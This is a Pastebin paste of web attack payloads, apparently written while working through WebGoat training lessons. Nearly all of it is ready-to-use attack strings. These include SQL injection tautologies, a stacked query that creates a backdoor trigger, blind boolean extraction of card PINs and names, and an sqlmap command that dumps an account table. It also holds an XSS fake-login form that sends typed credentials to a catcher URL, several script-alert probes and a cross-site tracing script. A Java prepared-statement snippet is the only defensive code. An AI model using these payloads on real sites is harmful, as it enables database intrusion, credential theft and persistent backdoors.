Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Smith' OR 1 = 1 or last_name = 'bla
- smith' OR '1' = '1
- String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
- try
- {
- Connection connection = WebSession.getConnections(s);
- PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- statement.setString(1, userId);
- statement.setString(2, password);
- ResultSet answer_results = statement.executeQuery();
- 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid
- 101 and ((SELECT pin from pins where cc_number='1111222233334444') > 1000);
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'K' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'j' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
- Oftewel Jill
- sqlmap -u "http://192.168.56.1:8080/search.php?what=1&search=search" --dump -D bookshop -T account
- </form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Get rekt skrub");} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
- <script>alert("rekt");</script>
- <script>alert("Dangerous");</script>
- <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
- <script>alert('Bang!')</script>
- <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement